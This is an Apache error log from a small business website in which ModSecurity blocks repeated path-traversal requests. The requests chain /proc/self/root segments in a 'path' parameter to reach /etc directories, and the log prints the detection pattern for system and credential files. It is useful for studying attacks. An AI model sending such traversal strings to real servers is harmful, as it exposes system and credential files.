[Thu Mar 19 13:59:15.591731 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:48502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrY-yqAr6etmhZHNp37AAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:20.186963 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:34998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwraBkFeYa1D6dYQnAJ3QAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:28.370640 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:35010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrcMdf6f5d65gmYZSSNwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:32.491682 2026] [:error] [pid 8307:tid 140411666392832] [client 74.7.243.128:44666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrdL-FhjpZGs9ba8qDXwAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:32.712936 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:58276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrdPu8EFLIOrSqIpvAywAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:35.775643 2026] [mime_magic:error] [pid 19093:tid 140411658000128] (70014)End of file found: [client 57.141.18.65:39688] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:59:36.415639 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:44670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwreBkFeYa1D6dYQnAJ5gAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:36.923108 2026] [:error] [pid 7545:tid 140411691570944] [client 74.7.241.31:57172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwreH8B84UptSoTJtYmCQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:38.488584 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60108] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:59:40.553351 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:44502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrfPu8EFLIOrSqIpvA0gAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:45.690548 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:44502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrgfu8EFLIOrSqIpvA2QAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:47.038529 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:56426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrg_qxLDW4GITHUkSAnwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:48.750403 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:39420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrg_u8EFLIOrSqIpvA2gAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:49.982098 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:56426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrhfqxLDW4GITHUkSAoAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:58.943462 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.243.128:38274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrjr-FhjpZGs9ba8qDcgAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:59.175721 2026] [:error] [pid 7032:tid 140411616036608] [client 74.7.241.31:39428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrj3OoiBhmblfxy7FQ8QAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:00:05.537527 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:32940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:00:13.008592 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.241.31:39612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrnb-FhjpZGs9ba8qDewAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:00:29.948734 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:48088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrrfu8EFLIOrSqIpvA-wAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:00:35.121884 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34156] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:00:43.384266 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:39614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwru8df6f5d65gmYZSSZgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:00:53.776564 2026] [:error] [pid 8557:tid 140411683178240] [client 74.7.243.128:43320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrxWm-FynrlR64ECVQVAAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:00:58.939295 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:47116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrysdf6f5d65gmYZSSbQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:01:04.150073 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35418] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:01:12.936661 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:45782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwr2BkFeYa1D6dYQnAKFgAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:01:34.073825 2026] [proxy_fcgi:error] [pid 7545:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36554] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:01:52.085780 2026] [mime_magic:error] [pid 8307:tid 140411641214720] (70014)End of file found: [client 57.141.18.34:45168] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:02:07.126064 2026] [proxy_fcgi:error] [pid 19093:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37980] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:02:16.765053 2026] [core:alert] [pid 15826:tid 140411649607424] [client 57.141.18.24:46156] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
